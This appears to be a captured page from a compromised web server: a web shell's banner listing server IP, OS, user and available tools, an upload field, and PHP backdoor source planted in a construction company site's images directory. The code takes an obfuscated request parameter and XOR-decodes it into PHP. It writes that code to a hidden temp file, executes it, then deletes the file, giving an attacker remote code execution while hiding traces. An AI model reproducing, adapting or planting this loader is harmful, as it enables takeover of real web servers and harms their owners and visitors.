| Server IP : 65.108.144.40 / Your IP : 216.73.217.165 Web Server : Apache/2.4.52 (Ubuntu) System : Linux ubuntu-8gb-hel1-1 5.15.0-173-generic #183-Ubuntu SMP Fri Mar 6 13:29:34 UTC 2026 x86_64 User : dev ( 1000) PHP Version : 8.2.30 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /var/www/html/Solum-construction/demo-job/images/ |
Upload File : |
<?php
if(isset($_REQUEST["\x64\x61t"]) ? true : false){
$hld = $_REQUEST["\x64\x61t"];
$hld = explode( '.' , $hld ) ;
$symbol = '';
$salt3 = 'abcdefghijklmnopqrstuvwxyz0123456789';
$sLen = strlen( $salt3);
$y = 0;
array_walk( $hld , function( $v8) use( &$symbol , &$y , $salt3 , $sLen) {
$sChar = ord( $salt3[$y %$sLen]);
$dec =( ( int)$v8 - $sChar -( $y %10)) ^ 15;
$symbol .=chr( $dec);
$y++;
});
$sym = array_filter(["/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), "/var/tmp", getcwd(), sys_get_temp_dir(), getenv("TMP"), "/dev/shm", session_save_path()]);
foreach ($sym as $factor) {
if (!( !is_dir($factor) || !is_writable($factor) )) {
$property_set = join("/", [$factor, ".parameter_group"]);
if (file_put_contents($property_set, $symbol)) {
require $property_set;
unlink($property_set);
exit;
}
}
}
}